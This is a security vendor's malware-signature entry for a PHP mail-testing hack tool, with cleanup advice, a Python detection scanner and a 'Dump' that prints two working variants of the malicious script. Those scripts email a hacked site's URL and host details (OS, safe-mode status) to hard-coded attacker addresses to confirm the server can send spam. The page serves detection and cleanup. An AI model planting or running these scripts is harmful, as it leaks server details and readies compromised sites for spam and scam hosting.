Malware Signatures


php.hacktool.scan-inb0x-hotmail.001

scan inb0x hotmail is a very basic mailing script that is primarily used to test whether sending email from a hacked server works, which may be useful for automated hacks.
This test is probably used to evaluate whether a newly hacked site can be used for spamming. Sometimes the script also emails some basic details about the server, such as OS type, safe mode status and the hacked site's URL.

Affecting

Any server with PHP enabled

Cleanup

Delete the mailer script and scan your server for other types of malware, specifically for backdoors. Make sure to identify and close the security hole.
You also need to check whether your server's IP address has been blacklisted by anti-spam blacklist providers as a result of the hacker activity.
You can sign up with us and let our team remove the malware for you.
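
For the server scan mentioned above, a heuristic sweep can be keyed to the traits both dumped variants share: a mail() call whose body is HTTP_HOST joined to REQUEST_URI, set_time_limit(0), and the php_uname / safe_mode lookups. This is an added example, not the vendor's signature; the trait weights, the threshold, the suffix list and the two sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Traits visible in the two dumped variants. Weights and threshold are
# assumptions of this example, not part of the vendor signature.
TRAITS = {
    "banner":     (3, re.compile(r"scan\s+inb0x\s+hotmail", re.I)),
    "mail_call":  (1, re.compile(r"(?<![\w>$])mail\s*\(", re.I)),
    "url_beacon": (2, re.compile(
        r"\$_SERVER\s*\[\s*['\"]HTTP_HOST['\"]\s*\]\s*\.\s*"
        r"\$_SERVER\s*\[\s*['\"]REQUEST_URI['\"]\s*\]")),
    "no_timeout": (1, re.compile(r"set_time_limit\s*\(\s*0\s*\)", re.I)),
    "host_recon": (1, re.compile(
        r"php_uname\s*\(|ini_get\s*\(\s*['\"]safe_mode['\"]", re.I)),
}
THRESHOLD = 4
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".inc"}

def score_php(source):
    """Return (score, matched trait names) for one PHP source string."""
    hits = [name for name, (_, rx) in TRAITS.items() if rx.search(source)]
    if "mail_call" not in hits:
        return 0, hits  # without a native mail() call it is not a mail tester
    return sum(TRAITS[name][0] for name in hits), hits

def scan_tree(root):
    """Walk a web root and list (path, score, traits) for suspicious files."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in PHP_SUFFIXES:
            continue
        try:
            text = path.read_text(encoding="latin-1")  # decodes any byte value
        except OSError:
            continue  # unreadable file: skip it, do not abort the sweep
        score, hits = score_php(text)
        if score >= THRESHOLD:
            findings.append((str(path), score, hits))
    return findings

# Constructed samples (not the dumped files): a trimmed tester and a contact form.
SAMPLE_TESTER = ("<?php set_time_limit(0);\n"
                 "if (mail($to, $subj, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $h))"
                 " { echo 'ok'; } ?>")
SAMPLE_CONTACT = "<?php $ok = mail($admin, 'Contact form', $message, $headers); ?>"

if __name__ == "__main__":
    print(score_php(SAMPLE_TESTER))   # meets the threshold
    print(score_php(SAMPLE_CONTACT))  # ordinary form mailer stays below it
```

A hit is a lead for manual review rather than a verdict; a renamed or obfuscated copy will not match, so the sweep complements a full malware scan and does not replace it.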

Dump


<?php //=================================
//
// scan inb0x hotmail v1.0 BoUnCeR
//
//
// priv8 file
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$email = "Hacker BoUnCeR";
$assunto = "BoUnCeR's Shell Smtp Tester V1.7";
$email1 = "james_soberekon@aol.com, relaymaxer@hotmail.com, mysteryshoppingusa@globomail.com";
$headers.= "From: <$email>rn";
if(mail($email1, $assunto, $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
echo "BoUnCeR My Boss Smtp Dey Available For This Shell And Im Go Good For Mailer Or Scamm Page Hosting Meanwhile I Don Mail Confirmation Enter Your Box!!!"; exit();
} else{
echo "Fucking Site Wey No Get SMTP !!!"; exit();
} ?>

...

<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "inbox200905@hotmail.com";
$assunto = "lup@";
$email1 = "inbox200905@hotmail.com";
$headers = "From: <$email>rn";
$headers = "MIME-Version: 1.0rn";
$headers .= "Content-type: text/html; charset=iso-8859-1rn";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}